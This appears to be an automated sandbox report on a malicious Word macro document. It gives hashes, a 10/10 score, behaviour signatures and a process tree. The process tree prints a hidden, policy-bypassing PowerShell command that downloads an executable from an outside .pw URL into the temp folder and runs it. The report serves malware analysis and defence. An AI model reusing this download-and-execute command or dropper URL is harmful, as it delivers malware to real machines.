Analysis

  • max time kernel
    24s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    10-07-2024 21:11

General

  • Target

    31046cbfa8c6364855b43d999a13c67fc72ef56de93a2d0dc5de23fdfb16f923.doc

  • Size

    110KB

  • MD5

    779769658592b517ac94754b2e1440e0

  • SHA1

    267ad7195a092fd012c5f7e7bead95ef4628d3cb

  • SHA256

    31046cbfa8c6364855b43d999a13c67fc72ef56de93a2d0dc5de23fdfb16f923

  • SHA512

    3806f137ce0546814c8ec2fa5f4383893547431fa63c9d8416094c7eaecd188f40361099c68278e3cc0924b1c73d3f7fa3971eb6e1a08fc4b3601187b551bf84

  • SSDEEP

    1536:d9ITuk/hms5bEb+FtYuvck3fu6Va8KefAQGQ2ZiYxXJXs:d9MV/XI+FtTvcAU0STi85s

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://w2afipbza0zj.pw/blog/wnx0bykhutp2.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\31046cbfa8c6364855b43d999a13c67fc72ef56de93a2d0dc5de23fdfb16f923.doc"
    1⤵
    • Drops file in Windows directory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2200
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c cd decennialimpuredistributorHadesnature & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://w2afipbza0zj.pw/blog/wnx0bykhutp2.exe','%TEMP%\meld.exe');Start (%TEMP%\meld.exe)
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:5772
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://w2afipbza0zj.pw/blog/wnx0bykhutp2.exe','C:\Users\Admin\AppData\Local\Temp\meld.exe');Start (C:\Users\Admin\AppData\Local\Temp\meld.exe)
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5840
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1692

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2200-0-0x000000002F1C1000-0x000000002F1C2000-memory.dmp

      Filesize

      4KB

    • memory/2200-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2200-2-0x00000000716AD000-0x00000000716B8000-memory.dmp

      Filesize

      44KB

    • memory/2200-1012-0x0000000005C90000-0x0000000005D90000-memory.dmp

      Filesize

      1024KB

    • memory/2200-1062-0x0000000005C90000-0x0000000005D90000-memory.dmp

      Filesize

      1024KB

    • memory/2200-1071-0x00000000716AD000-0x00000000716B8000-memory.dmp

      Filesize

      44KB

    • memory/2200-1072-0x0000000005C90000-0x0000000005D90000-memory.dmp

      Filesize

      1024KB